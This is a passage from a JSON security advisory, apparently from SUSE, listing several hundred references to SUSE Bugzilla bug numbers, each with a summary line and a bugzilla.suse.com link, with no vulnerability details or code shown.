"url": "https://bugzilla.suse.com/1254373"
},
{
"category": "self",
"summary": "SUSE Bug 1254378",
"url": "https://bugzilla.suse.com/1254378"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254518",
"url": "https://bugzilla.suse.com/1254518"
},
{
"category": "self",
"summary": "SUSE Bug 1254520",
"url": "https://bugzilla.suse.com/1254520"
},
{
"category": "self",
"summary": "SUSE Bug 1254599",
"url": "https://bugzilla.suse.com/1254599"
},
{
"category": "self",
"summary": "SUSE Bug 1254606",
"url": "https://bugzilla.suse.com/1254606"
},
{
"category": "self",
"summary": "SUSE Bug 1254611",
"url": "https://bugzilla.suse.com/1254611"
},
{
"category": "self",
"summary": "SUSE Bug 1254613",
"url": "https://bugzilla.suse.com/1254613"
},
{
"category": "self",
"summary": "SUSE Bug 1254615",
"url": "https://bugzilla.suse.com/1254615"
},
{
"category": "self",
"summary": "SUSE Bug 1254621",
"url": "https://bugzilla.suse.com/1254621"
},
{
"category": "self",
"summary": "SUSE Bug 1254623",
"url": "https://bugzilla.suse.com/1254623"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254626",
"url": "https://bugzilla.suse.com/1254626"
},
{
"category": "self",
"summary": "SUSE Bug 1254648",
"url": "https://bugzilla.suse.com/1254648"
},
{
"category": "self",
"summary": "SUSE Bug 1254649",
"url": "https://bugzilla.suse.com/1254649"
},
{
"category": "self",
"summary": "SUSE Bug 1254653",
"url": "https://bugzilla.suse.com/1254653"
},
{
"category": "self",
"summary": "SUSE Bug 1254655",
"url": "https://bugzilla.suse.com/1254655"
},
{
"category": "self",
"summary": "SUSE Bug 1254657",
"url": "https://bugzilla.suse.com/1254657"
},
{
"category": "self",
"summary": "SUSE Bug 1254660",
"url": "https://bugzilla.suse.com/1254660"
},
{
"category": "self",
"summary": "SUSE Bug 1254661",
"url": "https://bugzilla.suse.com/1254661"
},
{
"category": "self",
"summary": "SUSE Bug 1254663",
"url": "https://bugzilla.suse.com/1254663"
},
{
"category": "self",
"summary": "SUSE Bug 1254669",
"url": "https://bugzilla.suse.com/1254669"
},
{
"category": "self",
"summary": "SUSE Bug 1254677",
"url": "https://bugzilla.suse.com/1254677"
},
{
"category": "self",
"summary": "SUSE Bug 1254678",
"url": "https://bugzilla.suse.com/1254678"
},
{
"category": "self",
"summary": "SUSE Bug 1254688",
"url": "https://bugzilla.suse.com/1254688"
},
{
"category": "self",
"summary": "SUSE Bug 1254690",
"url": "https://bugzilla.suse.com/1254690"
},
{
"category": "self",
"summary": "SUSE Bug 1254691",
"url": "https://bugzilla.suse.com/1254691"
},
{
"category": "self",
"summary": "SUSE Bug 1254693",
"url": "https://bugzilla.suse.com/1254693"
},
{
"category": "self",
"summary": "SUSE Bug 1254695",
"url": "https://bugzilla.suse.com/1254695"
},
{
"category": "self",
"summary": "SUSE Bug 1254698",
"url": "https://bugzilla.suse.com/1254698"
},
{
"category": "self",
"summary": "SUSE Bug 1254701",
"url": "https://bugzilla.suse.com/1254701"
},
{
"category": "self",
"summary": "SUSE Bug 1254704",
"url": "https://bugzilla.suse.com/1254704"
},
{
"category": "self",
"summary": "SUSE Bug 1254705",
"url": "https://bugzilla.suse.com/1254705"
},
{
"category": "self",
"summary": "SUSE Bug 1254707",
"url": "https://bugzilla.suse.com/1254707"
},
{
"category": "self",
"summary": "SUSE Bug 1254712",
"url": "https://bugzilla.suse.com/1254712"
},
{
"category": "self",
"summary": "SUSE Bug 1254715",
"url": "https://bugzilla.suse.com/1254715"
},
{
"category": "self",
"summary": "SUSE Bug 1254717",
"url": "https://bugzilla.suse.com/1254717"
},
{
"category": "self",
"summary": "SUSE Bug 1254723",
"url": "https://bugzilla.suse.com/1254723"
},
{
"category": "self",
"summary": "SUSE Bug 1254724",
"url": "https://bugzilla.suse.com/1254724"
},
{
"category": "self",
"summary": "SUSE Bug 1254732",
"url": "https://bugzilla.suse.com/1254732"
},
{
"category": "self",
"summary": "SUSE Bug 1254733",
"url": "https://bugzilla.suse.com/1254733"
},
{
"category": "self",
"summary": "SUSE Bug 1254737",
"url": "https://bugzilla.suse.com/1254737"
},
{
"category": "self",
"summary": "SUSE Bug 1254739",
"url": "https://bugzilla.suse.com/1254739"
},
{
"category": "self",
"summary": "SUSE Bug 1254742",
"url": "https://bugzilla.suse.com/1254742"
},
{
"category": "self",
"summary": "SUSE Bug 1254743",
"url": "https://bugzilla.suse.com/1254743"
},
{
"category": "self",
"summary": "SUSE Bug 1254749",
"url": "https://bugzilla.suse.com/1254749"
},
{
"category": "self",
"summary": "SUSE Bug 1254750",
"url": "https://bugzilla.suse.com/1254750"
},
{
"category": "self",
"summary": "SUSE Bug 1254753",
"url": "https://bugzilla.suse.com/1254753"
},
{
"category": "self",
"summary": "SUSE Bug 1254754",
"url": "https://bugzilla.suse.com/1254754"
},
{
"category": "self",
"summary": "SUSE Bug 1254758",
"url": "https://bugzilla.suse.com/1254758"
},
{
"category": "self",
"summary": "SUSE Bug 1254761",
"url": "https://bugzilla.suse.com/1254761"
},
{
"category": "self",
"summary": "SUSE Bug 1254762",
"url": "https://bugzilla.suse.com/1254762"
},
{
"category": "self",
"summary": "SUSE Bug 1254765",
"url": "https://bugzilla.suse.com/1254765"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254782",
"url": "https://bugzilla.suse.com/1254782"
},
{
"category": "self",
"summary": "SUSE Bug 1254791",
"url": "https://bugzilla.suse.com/1254791"
},
{
"category": "self",
"summary": "SUSE Bug 1254793",
"url": "https://bugzilla.suse.com/1254793"
},
{
"category": "self",
"summary": "SUSE Bug 1254794",
"url": "https://bugzilla.suse.com/1254794"
},
{
"category": "self",
"summary": "SUSE Bug 1254795",
"url": "https://bugzilla.suse.com/1254795"
},
{
"category": "self",
"summary": "SUSE Bug 1254796",
"url": "https://bugzilla.suse.com/1254796"
},
{
"category": "self",
"summary": "SUSE Bug 1254797",
"url": "https://bugzilla.suse.com/1254797"
},
{
"category": "self",
"summary": "SUSE Bug 1254798",
"url": "https://bugzilla.suse.com/1254798"
},
{
"category": "self",
"summary": "SUSE Bug 1254813",
"url": "https://bugzilla.suse.com/1254813"
},
{
"category": "self",
"summary": "SUSE Bug 1254815",
"url": "https://bugzilla.suse.com/1254815"
},
{
"category": "self",
"summary": "SUSE Bug 1254825",
"url": "https://bugzilla.suse.com/1254825"
},
{
"category": "self",
"summary": "SUSE Bug 1254828",
"url": "https://bugzilla.suse.com/1254828"
},
{
"category": "self",
"summary": "SUSE Bug 1254829",
"url": "https://bugzilla.suse.com/1254829"
},
{
"category": "self",
"summary": "SUSE Bug 1254830",
"url": "https://bugzilla.suse.com/1254830"
},
{
"category": "self",
"summary": "SUSE Bug 1254832",
"url": "https://bugzilla.suse.com/1254832"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254840",
"url": "https://bugzilla.suse.com/1254840"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254843",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254846",
"url": "https://bugzilla.suse.com/1254846"
},
{
"category": "self",
"summary": "SUSE Bug 1254847",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "self",
"summary": "SUSE Bug 1254849",
"url": "https://bugzilla.suse.com/1254849"
},
{
"category": "self",
"summary": "SUSE Bug 1254850",
"url": "https://bugzilla.suse.com/1254850"
},
{
"category": "self",
"summary": "SUSE Bug 1254851",
"url": "https://bugzilla.suse.com/1254851"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254854",
"url": "https://bugzilla.suse.com/1254854"
},
{
"category": "self",
"summary": "SUSE Bug 1254856",
"url": "https://bugzilla.suse.com/1254856"
},
{
"category": "self",
"summary": "SUSE Bug 1254858",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "self",
"summary": "SUSE Bug 1254860",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "self",
"summary": "SUSE Bug 1254864",
"url": "https://bugzilla.suse.com/1254864"
},
{
"category": "self",
"summary": "SUSE Bug 1254869",
"url": "https://bugzilla.suse.com/1254869"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1254894",
"url": "https://bugzilla.suse.com/1254894"
},
{
"category": "self",
"summary": "SUSE Bug 1254918",
"url": "https://bugzilla.suse.com/1254918"
},
{
"category": "self",
"summary": "SUSE Bug 1254957",
"url": "https://bugzilla.suse.com/1254957"
},
{
"category": "self",
"summary": "SUSE Bug 1254959",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "self",
"summary": "SUSE Bug 1254983",
"url": "https://bugzilla.suse.com/1254983"
},
{
"category": "self",
"summary": "SUSE Bug 1254992",
"url": "https://bugzilla.suse.com/1254992"
},
{
"category": "self",
"summary": "SUSE Bug 1255005",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "self",
"summary": "SUSE Bug 1255009",
"url": "https://bugzilla.suse.com/1255009"
},
{
"category": "self",
"summary": "SUSE Bug 1255025",
"url": "https://bugzilla.suse.com/1255025"
},
{
"category": "self",
"summary": "SUSE Bug 1255026",
"url": "https://bugzilla.suse.com/1255026"
},
{
"category": "self",
"summary": "SUSE Bug 1255030",
"url": "https://bugzilla.suse.com/1255030"
},
{
"category": "self",
"summary": "SUSE Bug 1255033",
"url": "https://bugzilla.suse.com/1255033"
},
{
"category": "self",
"summary": "SUSE Bug 1255034",
"url": "https://bugzilla.suse.com/1255034"
},
{
"category": "self",
"summary": "SUSE Bug 1255035",
"url": "https://bugzilla.suse.com/1255035"
},
{
"category": "self",
"summary": "SUSE Bug 1255039",
"url": "https://bugzilla.suse.com/1255039"
},
{
"category": "self",
"summary": "SUSE Bug 1255041",
"url": "https://bugzilla.suse.com/1255041"
},
{
"category": "self",
"summary": "SUSE Bug 1255042",
"url": "https://bugzilla.suse.com/1255042"
},
{
"category": "self",
"summary": "SUSE Bug 1255046",
"url": "https://bugzilla.suse.com/1255046"
},
{
"category": "self",
"summary": "SUSE Bug 1255057",
"url": "https://bugzilla.suse.com/1255057"
},
{
"category": "self",
"summary": "SUSE Bug 1255062",
"url": "https://bugzilla.suse.com/1255062"
},
{
"category": "self",
"summary": "SUSE Bug 1255064",
"url": "https://bugzilla.suse.com/1255064"
},
{
"category": "self",
"summary": "SUSE Bug 1255065",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "self",
"summary": "SUSE Bug 1255068",
"url": "https://bugzilla.suse.com/1255068"
},
{
"category": "self",
"summary": "SUSE Bug 1255072",
"url": "https://bugzilla.suse.com/1255072"
},
{
"category": "self",
"summary": "SUSE Bug 1255075",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "self",
"summary": "SUSE Bug 1255077",
"url": "https://bugzilla.suse.com/1255077"
},
{
"category": "self",
"summary": "SUSE Bug 1255081",
"url": "https://bugzilla.suse.com/1255081"
},
{
"category": "self",
"summary": "SUSE Bug 1255082",
"url": "https://bugzilla.suse.com/1255082"
},
{
"category": "self",
"summary": "SUSE Bug 1255083",
"url": "https://bugzilla.suse.com/1255083"
},
{
"category": "self",
"summary": "SUSE Bug 1255092",
"url": "https://bugzilla.suse.com/1255092"
},
{
"category": "self",
"summary": "SUSE Bug 1255094",
"url": "https://bugzilla.suse.com/1255094"
},
{
"category": "self",
"summary": "SUSE Bug 1255095",
"url": "https://bugzilla.suse.com/1255095"
},
{
"category": "self",
"summary": "SUSE Bug 1255100",
"url": "https://bugzilla.suse.com/1255100"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255122",
"url": "https://bugzilla.suse.com/1255122"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255129",
"url": "https://bugzilla.suse.com/1255129"
},
{
"category": "self",
"summary": "SUSE Bug 1255131",
"url": "https://bugzilla.suse.com/1255131"
},
{
"category": "self",
"summary": "SUSE Bug 1255134",
"url": "https://bugzilla.suse.com/1255134"
},
{
"category": "self",
"summary": "SUSE Bug 1255135",
"url": "https://bugzilla.suse.com/1255135"
},
{
"category": "self",
"summary": "SUSE Bug 1255136",
"url": "https://bugzilla.suse.com/1255136"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255142",
"url": "https://bugzilla.suse.com/1255142"
},
{
"category": "self",
"summary": "SUSE Bug 1255146",
"url": "https://bugzilla.suse.com/1255146"
},
{
"category": "self",
"summary": "SUSE Bug 1255149",
"url": "https://bugzilla.suse.com/1255149"
},
{
"category": "self",
"summary": "SUSE Bug 1255152",
"url": "https://bugzilla.suse.com/1255152"
},
{
"category": "self",
"summary": "SUSE Bug 1255154",
"url": "https://bugzilla.suse.com/1255154"
},
{
"category": "self",
"summary": "SUSE Bug 1255155",
"url": "https://bugzilla.suse.com/1255155"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255163",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255167",
"url": "https://bugzilla.suse.com/1255167"
},
{
"category": "self",
"summary": "SUSE Bug 1255169",
"url": "https://bugzilla.suse.com/1255169"
},
{
"category": "self",
"summary": "SUSE Bug 1255171",
"url": "https://bugzilla.suse.com/1255171"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255175",
"url": "https://bugzilla.suse.com/1255175"
},
{
"category": "self",
"summary": "SUSE Bug 1255179",
"url": "https://bugzilla.suse.com/1255179"
},
{
"category": "self",
"summary": "SUSE Bug 1255182",
"url": "https://bugzilla.suse.com/1255182"
},
{
"category": "self",
"summary": "SUSE Bug 1255187",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "self",
"summary": "SUSE Bug 1255190",
"url": "https://bugzilla.suse.com/1255190"
},
{
"category": "self",
"summary": "SUSE Bug 1255193",
"url": "https://bugzilla.suse.com/1255193"
},
{
"category": "self",
"summary": "SUSE Bug 1255197",
"url": "https://bugzilla.suse.com/1255197"
},
{
"category": "self",
"summary": "SUSE Bug 1255199",
"url": "https://bugzilla.suse.com/1255199"
},
{
"category": "self",
"summary": "SUSE Bug 1255202",
"url": "https://bugzilla.suse.com/1255202"
},
{
"category": "self",
"summary": "SUSE Bug 1255203",
"url": "https://bugzilla.suse.com/1255203"
},
{
"category": "self",
"summary": "SUSE Bug 1255206",
"url": "https://bugzilla.suse.com/1255206"
},
{
"category": "self",
"summary": "SUSE Bug 1255209",
"url": "https://bugzilla.suse.com/1255209"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255218",
"url": "https://bugzilla.suse.com/1255218"
},
{
"category": "self",
"summary": "SUSE Bug 1255221",
"url": "https://bugzilla.suse.com/1255221"
},
{
"category": "self",
"summary": "SUSE Bug 1255224",
"url": "https://bugzilla.suse.com/1255224"
},
{
"category": "self",
"summary": "SUSE Bug 1255227",
"url": "https://bugzilla.suse.com/1255227"
},
{
"category": "self",
"summary": "SUSE Bug 1255230",
"url": "https://bugzilla.suse.com/1255230"
},
{
"category": "self",
"summary": "SUSE Bug 1255233",
"url": "https://bugzilla.suse.com/1255233"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255246",
"url": "https://bugzilla.suse.com/1255246"
},
{
"category": "self",
"summary": "SUSE Bug 1255251",
"url": "https://bugzilla.suse.com/1255251"
},
{
"category": "self",
"summary": "SUSE Bug 1255252",
"url": "https://bugzilla.suse.com/1255252"
},
{
"category": "self",
"summary": "SUSE Bug 1255253",
"url": "https://bugzilla.suse.com/1255253"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255259",
"url": "https://bugzilla.suse.com/1255259"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255262",
"url": "https://bugzilla.suse.com/1255262"
},
{
"category": "self",
"summary": "SUSE Bug 1255265",
"url": "https://bugzilla.suse.com/1255265"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255272",
"url": "https://bugzilla.suse.com/1255272"
},
{
"category": "self",
"summary": "SUSE Bug 1255273",
"url": "https://bugzilla.suse.com/1255273"
},
{
"category": "self",
"summary": "SUSE Bug 1255274",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "self",
"summary": "SUSE Bug 1255276",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "self",
"summary": "SUSE Bug 1255279",
"url": "https://bugzilla.suse.com/1255279"
},
{
"category": "self",
"summary": "SUSE Bug 1255280",
"url": "https://bugzilla.suse.com/1255280"
},
{
"category": "self",
"summary": "SUSE Bug 1255281",
"url": "https://bugzilla.suse.com/1255281"
},
{
"category": "self",
"summary": "SUSE Bug 1255297",
"url": "https://bugzilla.suse.com/1255297"
},
{
"category": "self",
"summary": "SUSE Bug 1255318",
"url": "https://bugzilla.suse.com/1255318"
},
{
"category": "self",
"summary": "SUSE Bug 1255325",
"url": "https://bugzilla.suse.com/1255325"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255329",
"url": "https://bugzilla.suse.com/1255329"
},
{
"category": "self",
"summary": "SUSE Bug 1255351",
"url": "https://bugzilla.suse.com/1255351"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255379",
"url": "https://bugzilla.suse.com/1255379"
},
{
"category": "self",
"summary": "SUSE Bug 1255380",
"url": "https://bugzilla.suse.com/1255380"
},
{
"category": "self",
"summary": "SUSE Bug 1255395",
"url": "https://bugzilla.suse.com/1255395"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255415",
"url": "https://bugzilla.suse.com/1255415"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255428",
"url": "https://bugzilla.suse.com/1255428"
},
{
"category": "self",
"summary": "SUSE Bug 1255480",
"url": "https://bugzilla.suse.com/1255480"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255483",
"url": "https://bugzilla.suse.com/1255483"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255489",
"url": "https://bugzilla.suse.com/1255489"
},
{
"category": "self",
"summary": "SUSE Bug 1255493",
"url": "https://bugzilla.suse.com/1255493"
},
{
"category": "self",
"summary": "SUSE Bug 1255495",
"url": "https://bugzilla.suse.com/1255495"
},
{
"category": "self",
"summary": "SUSE Bug 1255505",
"url": "https://bugzilla.suse.com/1255505"
},
{
"category": "self",
"summary": "SUSE Bug 1255507",
"url": "https://bugzilla.suse.com/1255507"
},
{
"category": "self",
"summary": "SUSE Bug 1255530",
"url": "https://bugzilla.suse.com/1255530"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255538",
"url": "https://bugzilla.suse.com/1255538"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255540",
"url": "https://bugzilla.suse.com/1255540"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255545",
"url": "https://bugzilla.suse.com/1255545"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255549",
"url": "https://bugzilla.suse.com/1255549"
},
{
"category": "self",
"summary": "SUSE Bug 1255550",
"url": "https://bugzilla.suse.com/1255550"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255553",
"url": "https://bugzilla.suse.com/1255553"
},
{
"category": "self",
"summary": "SUSE Bug 1255557",
"url": "https://bugzilla.suse.com/1255557"
},
{
"category": "self",
"summary": "SUSE Bug 1255558",
"url": "https://bugzilla.suse.com/1255558"
},
{
"category": "self",
"summary": "SUSE Bug 1255563",
"url": "https://bugzilla.suse.com/1255563"
},
{
"category": "self",
"summary": "SUSE Bug 1255564",
"url": "https://bugzilla.suse.com/1255564"
},
{
"category": "self",
"summary": "SUSE Bug 1255567",
"url": "https://bugzilla.suse.com/1255567"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255570",
"url": "https://bugzilla.suse.com/1255570"
},
{
"category": "self",
"summary": "SUSE Bug 1255578",
"url": "https://bugzilla.suse.com/1255578"
},
{
"category": "self",
"summary": "SUSE Bug 1255579",
"url": "https://bugzilla.suse.com/1255579"
},
{
"category": "self",
"summary": "SUSE Bug 1255580",
"url": "https://bugzilla.suse.com/1255580"
},
{
"category": "self",
"summary": "SUSE Bug 1255583",
"url": "https://bugzilla.suse.com/1255583"
},
{
"category": "self",
"summary": "SUSE Bug 1255591",
"url": "https://bugzilla.suse.com/1255591"
},
{
"category": "self",
"summary": "SUSE Bug 1255601",
"url": "https://bugzilla.suse.com/1255601"
},
{
"category": "self",
"summary": "SUSE Bug 1255603",
"url": "https://bugzilla.suse.com/1255603"
},
{
"category": "self",
"summary": "SUSE Bug 1255605",
"url": "https://bugzilla.suse.com/1255605"
},
{
"category": "self",
"summary": "SUSE Bug 1255611",
"url": "https://bugzilla.suse.com/1255611"
},
{
"category": "self",
"summary": "SUSE Bug 1255614",
"url": "https://bugzilla.suse.com/1255614"
},
{
"category": "self",
"summary": "SUSE Bug 1255615",
"url": "https://bugzilla.suse.com/1255615"
},
{
"category": "self",
"summary": "SUSE Bug 1255616",
"url": "https://bugzilla.suse.com/1255616"
},
{
"category": "self",
"summary": "SUSE Bug 1255617",
"url": "https://bugzilla.suse.com/1255617"
},
{
"category": "self",
"summary": "SUSE Bug 1255618",
"url": "https://bugzilla.suse.com/1255618"
},
{
"category": "self",
"summary": "SUSE Bug 1255621",
"url": "https://bugzilla.suse.com/1255621"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255628",
"url": "https://bugzilla.suse.com/1255628"
},
{
"category": "self",
"summary": "SUSE Bug 1255629",
"url": "https://bugzilla.suse.com/1255629"
},
{
"category": "self",
"summary": "SUSE Bug 1255630",
"url": "https://bugzilla.suse.com/1255630"
},
{
"category": "self",
"summary": "SUSE Bug 1255632",
"url": "https://bugzilla.suse.com/1255632"
},
{
"category": "self",
"summary": "SUSE Bug 1255636",
"url": "https://bugzilla.suse.com/1255636"
},
{
"category": "self",
"summary": "SUSE Bug 1255688",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "self",
"summary": "SUSE Bug 1255691",
"url": "https://bugzilla.suse.com/1255691"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255698",
"url": "https://bugzilla.suse.com/1255698"
},
{
"category": "self",
"summary": "SUSE Bug 1255702",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "self",
"summary": "SUSE Bug 1255704",
"url": "https://bugzilla.suse.com/1255704"
},
{
"category": "self",
"summary": "SUSE Bug 1255706",
"url": "https://bugzilla.suse.com/1255706"
},
{
"category": "self",
"summary": "SUSE Bug 1255707",
"url": "https://bugzilla.suse.com/1255707"
},
{
"category": "self",
"summary": "SUSE Bug 1255709",
"url": "https://bugzilla.suse.com/1255709"
},
{
"category": "self",
"summary": "SUSE Bug 1255722",
"url": "https://bugzilla.suse.com/1255722"
},
{
"category": "self",
"summary": "SUSE Bug 1255758",
"url": "https://bugzilla.suse.com/1255758"
},
{
"category": "self",
"summary": "SUSE Bug 1255759",
"url": "https://bugzilla.suse.com/1255759"
},
{
"category": "self",
"summary": "SUSE Bug 1255760",
"url": "https://bugzilla.suse.com/1255760"
},
{
"category": "self",
"summary": "SUSE Bug 1255763",
"url": "https://bugzilla.suse.com/1255763"
},
{
"category": "self",
"summary": "SUSE Bug 1255769",
"url": "https://bugzilla.suse.com/1255769"
},
{
"category": "self",
"summary": "SUSE Bug 1255770",
"url": "https://bugzilla.suse.com/1255770"
},
{
"category": "self",
"summary": "SUSE Bug 1255772",
"url": "https://bugzilla.suse.com/1255772"
},
{
"category": "self",
"summary": "SUSE Bug 1255774",
"url": "https://bugzilla.suse.com/1255774"
},
{
"category": "self",
"summary": "SUSE Bug 1255775",
"url": "https://bugzilla.suse.com/1255775"
},
{
"category": "self",
"summary": "SUSE Bug 1255776",
"url": "https://bugzilla.suse.com/1255776"
},
{
"category": "self",
"summary": "SUSE Bug 1255780",
"url": "https://bugzilla.suse.com/1255780"
},
{
"category": "self",
"summary": "SUSE Bug 1255785",
"url": "https://bugzilla.suse.com/1255785"
},
{
"category": "self",
"summary": "SUSE Bug 1255786",
"url": "https://bugzilla.suse.com/1255786"
},
{
"category": "self",
"summary": "SUSE Bug 1255789",
"url": "https://bugzilla.suse.com/1255789"
},
{
"category": "self",
"summary": "SUSE Bug 1255790",
"url": "https://bugzilla.suse.com/1255790"
},
{
"category": "self",
"summary": "SUSE Bug 1255792",
"url": "https://bugzilla.suse.com/1255792"
},
{
"category": "self",
"summary": "SUSE Bug 1255793",
"url": "https://bugzilla.suse.com/1255793"
},
{
"category": "self",
"summary": "SUSE Bug 1255795",
"url": "https://bugzilla.suse.com/1255795"
},
{
"category": "self",
"summary": "SUSE Bug 1255798",
"url": "https://bugzilla.suse.com/1255798"
},
{
"category": "self",
"summary": "SUSE Bug 1255800",
"url": "https://bugzilla.suse.com/1255800"
},
{
"category": "self",
"summary": "SUSE Bug 1255801",
"url": "https://bugzilla.suse.com/1255801"
},
{
"category": "self",
"summary": "SUSE Bug 1255806",
"url": "https://bugzilla.suse.com/1255806"
},
{
"category": "self",
"summary": "SUSE Bug 1255807",
"url": "https://bugzilla.suse.com/1255807"
},
{
"category": "self",
"summary": "SUSE Bug 1255809",
"url": "https://bugzilla.suse.com/1255809"
},
{
"category": "self",
"summary": "SUSE Bug 1255810",
"url": "https://bugzilla.suse.com/1255810"
},
{
"category": "self",
"summary": "SUSE Bug 1255812",
"url": "https://bugzilla.suse.com/1255812"
},
{
"category": "self",
"summary": "SUSE Bug 1255814",
"url": "https://bugzilla.suse.com/1255814"
},
{
"category": "self",
"summary": "SUSE Bug 1255820",
"url": "https://bugzilla.suse.com/1255820"
},
{
"category": "self",
"summary": "SUSE Bug 1255838",
"url": "https://bugzilla.suse.com/1255838"
},
{
"category": "self",
"summary": "SUSE Bug 1255842",
